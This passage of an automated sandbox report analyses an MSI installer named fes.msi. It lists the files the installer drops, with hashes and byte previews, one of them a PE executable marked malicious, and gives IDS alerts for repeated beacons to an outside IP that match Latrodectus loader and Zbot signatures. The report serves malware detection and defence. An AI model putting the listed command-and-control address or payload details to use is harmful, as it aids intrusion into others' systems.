SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI16F7.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	401013
Entropy (8bit):	6.5919221010343225
Encrypted:	false
SSDEEP:	6144:GMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1x:GMvZx0FlS68zBQSncb4ZPQTpAjZxqO1x
MD5:	F690E7D5BD372BB9D748516D57EDC7CB
SHA1:	1466C372DE7B344AFEB2DB206CE83EC6F60A6FAE
SHA-256:	C25CA9C27CA80046ACBB6C1818E1E19616C136B4CCA33C410AB43A2453E324A6
SHA-512:	FC642E215826F23241ADE04D600424CFF0C7E932C152B810177BCF553D50EE9A9F38FA3F026CF1D2AF24417613D24E243F98D92A77D19872FC1C0E1F639B31A9
Malicious:	false
Preview:	...@IXOS.@.....@a].Y.@.....@.....@.....@.....@.....@......&.{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}..Globalcheck..fes.msi.@.....@#....@.....@........&.{C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}.....@.....@.....@.....@.......@.....@.....@.......@......Globalcheck......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB};.C:\Users\user\AppData\Roaming\Globalcheck LLC\Globalcheck\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}0.01:\Software\Globalcheck LLC\Globalcheck\Version.@.......@.....@.....@......&.{602B36A8-BB6A-4A36-906F-F62140AE53DB}).C:\Users\user\AppData\Roaming\avutil.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".;.C:\Users\user\AppData\Roaming\Globalcheck LLC\Globalcheck\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@L....@....

C:\Windows\Installer\MSI17D3.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	399328
Entropy (8bit):	6.589290025452677
Encrypted:	false
SSDEEP:	6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
MD5:	B9545ED17695A32FACE8C3408A6A3553
SHA1:	F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
SHA-256:	1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
SHA-512:	F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1622221895499463
Encrypted:	false
SSDEEP:	12:JSbX72Fji+AGiLIlHVRpqh/7777777777777777777777777vDHFpwYjOiXDpZlN:JjQI56Q5iX2F
MD5:	F3C51BFDACAD24F939E2395A928F3124
SHA1:	0322D8F71DE33A126E497F195BA33C8C6CFBA3CD
SHA-256:	C29BFE3722D6293458F08C2C185B5C119F00F1AAF7B647CACB9B9E436927C4BA
SHA-512:	744BA337FCEB615AADBB5A6C314F64E63E8AADA49196C3B27DCFAC025B27EAA35034F95106248320F381F196AF8078639C3CFA031D69C6582B039EB482FC5AF3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.543984216305642
Encrypted:	false
SSDEEP:	48:j8PhzuRc06WXOGnT5xkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:Khz1InTEBwEl+Wl7EChBl+Wlm7
MD5:	43044C9A2350F70A1BDAC4EDD9345ACC
SHA1:	51B7AE6E58E51AD752680818A2382683BB462CD3
SHA-256:	F6AC94F7F78132A0A15F9FF9B52FB7E587D3C5C1DDCC166EE3C77BFA697D8F5A
SHA-512:	59142A8A3D8B2D738A3E118745AADB6DFD3DA8EA62EE005B8C186A91B0CFD200A975840BC5000FEDB5BCBF2D5A1860D175B1B6AB0B85854DF2A5AE685C923482
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375175565011653
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauK:zTtbmkExhMJCIpErv
MD5:	60B3F2522CF2FA11873137208CFDB2ED
SHA1:	503A8563997BCCFCCEAB018286E4883049BE52A1
SHA-256:	86FEC627345F7CC26E8CFC34EE354E84815E23D0058E01EA0D9D753B650E49B4
SHA-512:	A6D687958BB18B566660246369B2F327CA77C72560E8FEEC688CB48AF10B6352C715054DA963346E04A4553F4CD57747742183518EBA1D4114C70E8B9CDB252F
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF134649BAE62D7D3E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06865931830471758
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKO0QwYIwOiXM16Vky6lZ:2F0i8n0itFzDHFpwYjOiX2Z
MD5:	26F74156E878F0B4F7F18D8662F0F11E
SHA1:	0D72CA0DDC3525933EA7A1217AEE8D9A1FB9C388
SHA-256:	1C07A36FC17C3CF2B2E8DF9CF0F095DCF870E6774FED5097A48F5CBD3BBFC668
SHA-512:	7E38AE02F84062B8C60A3B7DFE53DF3F294AF4A86BFE6508B49AC3E1150C166F0849B0562F24EFD127C68EAFD6676D985ACE71D6AB3D7E7E34516DC2E9D77270
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF28C5470BBDFB6AB8.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.239202807521429
Encrypted:	false
SSDEEP:	48:PAruANvcFXOlT5LPkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:IrcoTWBwEl+Wl7EChBl+Wlm7
MD5:	AB630DB5FAEB292F3C13C3963D101B66
SHA1:	746FB3589BBD2E240839BAC4EED506C7127BBD80
SHA-256:	907BF244FFAE0A766243CB2B146E2793EFC71096B8C9CC261333769752C8115B
SHA-512:	997A31A379678E8971198DE8307A2C0F665D2B9BD92511780386AA749CEF448731F7C563572E4A6D75E9C006A4B4F3EE654E955664825A555C6DD4BEAD16A35B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF58621B6FFD435B31.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.543984216305642
Encrypted:	false
SSDEEP:	48:j8PhzuRc06WXOGnT5xkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:Khz1InTEBwEl+Wl7EChBl+Wlm7
MD5:	43044C9A2350F70A1BDAC4EDD9345ACC
SHA1:	51B7AE6E58E51AD752680818A2382683BB462CD3
SHA-256:	F6AC94F7F78132A0A15F9FF9B52FB7E587D3C5C1DDCC166EE3C77BFA697D8F5A
SHA-512:	59142A8A3D8B2D738A3E118745AADB6DFD3DA8EA62EE005B8C186A91B0CFD200A975840BC5000FEDB5BCBF2D5A1860D175B1B6AB0B85854DF2A5AE685C923482
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7C567A999033F7B9.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF87B90587ED99D245.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9AFD31F2B35700B4.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.239202807521429
Encrypted:	false
SSDEEP:	48:PAruANvcFXOlT5LPkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:IrcoTWBwEl+Wl7EChBl+Wlm7
MD5:	AB630DB5FAEB292F3C13C3963D101B66
SHA1:	746FB3589BBD2E240839BAC4EED506C7127BBD80
SHA-256:	907BF244FFAE0A766243CB2B146E2793EFC71096B8C9CC261333769752C8115B
SHA-512:	997A31A379678E8971198DE8307A2C0F665D2B9BD92511780386AA749CEF448731F7C563572E4A6D75E9C006A4B4F3EE654E955664825A555C6DD4BEAD16A35B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA7CDC5F5B2942A5C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.543984216305642
Encrypted:	false
SSDEEP:	48:j8PhzuRc06WXOGnT5xkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:Khz1InTEBwEl+Wl7EChBl+Wlm7
MD5:	43044C9A2350F70A1BDAC4EDD9345ACC
SHA1:	51B7AE6E58E51AD752680818A2382683BB462CD3
SHA-256:	F6AC94F7F78132A0A15F9FF9B52FB7E587D3C5C1DDCC166EE3C77BFA697D8F5A
SHA-512:	59142A8A3D8B2D738A3E118745AADB6DFD3DA8EA62EE005B8C186A91B0CFD200A975840BC5000FEDB5BCBF2D5A1860D175B1B6AB0B85854DF2A5AE685C923482
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD621D83050ACF91B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFDCEA859201E9E10C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.239202807521429
Encrypted:	false
SSDEEP:	48:PAruANvcFXOlT5LPkBw5Wl+SCWlkAECiCyCXozWl+SCWlCT57:IrcoTWBwEl+Wl7EChBl+Wlm7
MD5:	AB630DB5FAEB292F3C13C3963D101B66
SHA1:	746FB3589BBD2E240839BAC4EED506C7127BBD80
SHA-256:	907BF244FFAE0A766243CB2B146E2793EFC71096B8C9CC261333769752C8115B
SHA-512:	997A31A379678E8971198DE8307A2C0F665D2B9BD92511780386AA749CEF448731F7C563572E4A6D75E9C006A4B4F3EE654E955664825A555C6DD4BEAD16A35B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE5EE65640899CFE1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF0876073A5D49207.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.13003185354218783
Encrypted:	false
SSDEEP:	48:F3uTeWl+SCWl3Wl+SCWlkAECiCyCXosw8k:F3Ql+Wlml+Wl7EChJw1
MD5:	266F665D0625A8796316A14F899790A8
SHA1:	448F7337D70F5093CFC8E2F006C5707201B7415F
SHA-256:	537ABDB45C5B98C4204321D0513E25DA7B646FFBF568EA2D3AE3C21BBB79103A
SHA-512:	C6E291BE1909882114991A1F3DC89E500A412F5FB961C950F650F825774B3CD7D58083F69E94F4EBAFC7A3728B68BD6A1C8293B79895979DCF22A1BC028D088C
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF5C9C634073B1FC6.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {C49E1A71-9FF1-45F1-BD5D-A50F7F71232E}, Number of Words: 10, Subject: Globalcheck, Author: Globalcheck LLC, Name of Creating Application: Globalcheck, Template: ;1033, Comments: Database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	7.4656553416380085
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	fes.msi
File size:	2'200'576 bytes
MD5:	371fe9184f46204250bcb30fe62f3a08
SHA1:	490453e5eeaaf89071a29c68548314d1e9b21592
SHA256:	658b8c47d7193c7c31a2540b2f54fcdfb9298d8346a4ad3be7e684ef946f57a5
SHA512:	f06e18a495c8df1a48def116711e7f1452e520ba49585971bdc54d9d6c0e441de2a490544edf7e34fd9453c4de5e67f0e11f0ee45479906b138e6c658ddac199
SSDEEP:	49152:pXE3YQW8zBQSc0ZnSKBZKumZr7AaIGQ5rr0Go:UYH0Zn3K/AafII
TLSH:	B6A5F12273C6C537C96E01302A29D66B557DFCB74B3140D7A3C8291EAE744C1A63AFA7
File Content Preview:	........................>..................."...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...O..............................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-03T17:44:54.379891+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49851	104.21.68.89	443	TCP
2024-12-03T17:44:54.415374+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49851	104.21.68.89	443	TCP
2024-12-03T17:44:58.055216+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49861	104.21.68.89	443	TCP
2024-12-03T17:44:59.611086+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49861	104.21.68.89	443	TCP
2024-12-03T17:45:01.629389+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49869	104.21.68.89	443	TCP
2024-12-03T17:45:03.275392+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49869	104.21.68.89	443	TCP
2024-12-03T17:45:05.379758+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49878	104.21.68.89	443	TCP
2024-12-03T17:45:07.016597+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49878	104.21.68.89	443	TCP
2024-12-03T17:45:08.346102+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49886	104.21.68.89	443	TCP
2024-12-03T17:45:10.537073+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49886	104.21.68.89	443	TCP
2024-12-03T17:45:10.537073+0100	2018052	ET MALWARE Zbot Generic URI/Header Struct .bin	1	192.168.2.4	49886	104.21.68.89	443	TCP
2024-12-03T17:45:11.770296+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49894	104.21.68.89	443	TCP
2024-12-03T17:45:13.494370+0100	2018052	ET MALWARE Zbot Generic URI/Header Struct .bin	1	192.168.2.4	49894	104.21.68.89	443	TCP
2024-12-03T17:45:14.774392+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49904	104.21.68.89	443	TCP
2024-12-03T17:45:16.562417+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49904	104.21.68.89	443	TCP
2024-12-03T17:45:16.562417+0100	2018052	ET MALWARE Zbot Generic URI/Header Struct .bin	1	192.168.2.4	49904	104.21.68.89	443	TCP
2024-12-03T17:45:20.564003+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49918	104.21.68.89	443	TCP
2024-12-03T17:45:22.185697+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49918	104.21.68.89	443	TCP
2024-12-03T17:45:23.534992+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49926	104.21.68.89	443	TCP
2024-12-03T17:45:23.620132+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49926	104.21.68.89	443	TCP
2024-12-03T17:45:26.493487+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49933	104.21.68.89	443	TCP
2024-12-03T17:45:28.142357+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49933	104.21.68.89	443	TCP
2024-12-03T17:45:29.462059+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49940	104.21.68.89	443	TCP
2024-12-03T17:45:31.050996+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49940	104.21.68.89	443	TCP
2024-12-03T17:45:32.419083+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49948	104.21.68.89	443	TCP
2024-12-03T17:45:34.078027+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49948	104.21.68.89	443	TCP
2024-12-03T17:45:35.304375+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49956	104.21.68.89	443	TCP
2024-12-03T17:45:35.305293+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49956	104.21.68.89	443	TCP
2024-12-03T17:45:38.218907+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49962	104.21.68.89	443	TCP
2024-12-03T17:45:39.863630+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49962	104.21.68.89	443	TCP
2024-12-03T17:45:41.613892+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49972	104.21.68.89	443	TCP
2024-12-03T17:45:43.254844+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49972	104.21.68.89	443	TCP
2024-12-03T17:45:44.594985+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49979	104.21.68.89	443	TCP
2024-12-03T17:45:45.985478+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49979	104.21.68.89	443	TCP
2024-12-03T17:45:47.402474+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49986	104.21.68.89	443	TCP
2024-12-03T17:45:48.998507+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49986	104.21.68.89	443	TCP
2024-12-03T17:45:50.363398+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49994	104.21.68.89	443	TCP
2024-12-03T17:45:51.982734+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	49994	104.21.68.89	443	TCP
2024-12-03T17:45:53.382246+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50002	104.21.68.89	443	TCP
2024-12-03T17:45:55.005110+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50002	104.21.68.89	443	TCP
2024-12-03T17:45:56.463152+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50008	104.21.68.89	443	TCP
2024-12-03T17:45:57.857798+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50008	104.21.68.89	443	TCP
2024-12-03T17:45:59.272932+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50016	104.21.68.89	443	TCP
2024-12-03T17:46:00.923656+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50016	104.21.68.89	443	TCP
2024-12-03T17:46:02.293633+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50025	104.21.68.89	443	TCP
2024-12-03T17:46:03.910895+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50025	104.21.68.89	443	TCP
2024-12-03T17:46:05.673225+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50029	104.21.68.89	443	TCP
2024-12-03T17:46:07.271717+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50029	104.21.68.89	443	TCP
2024-12-03T17:46:08.704029+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50030	104.21.68.89	443	TCP
2024-12-03T17:46:10.384291+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50030	104.21.68.89	443	TCP
2024-12-03T17:46:11.743479+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50031	104.21.68.89	443	TCP
2024-12-03T17:46:13.177160+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50031	104.21.68.89	443	TCP
2024-12-03T17:46:14.546290+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-03T17:46:15.951144+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-03T17:46:17.305730+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50033	104.21.68.89	443	TCP
2024-12-03T17:46:18.925226+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50033	104.21.68.89	443	TCP
2024-12-03T17:46:20.824721+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50034	104.21.68.89	443	TCP
2024-12-03T17:46:22.430239+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50034	104.21.68.89	443	TCP
2024-12-03T17:46:23.775020+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50035	104.21.68.89	443	TCP
2024-12-03T17:46:25.189996+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50035	104.21.68.89	443	TCP
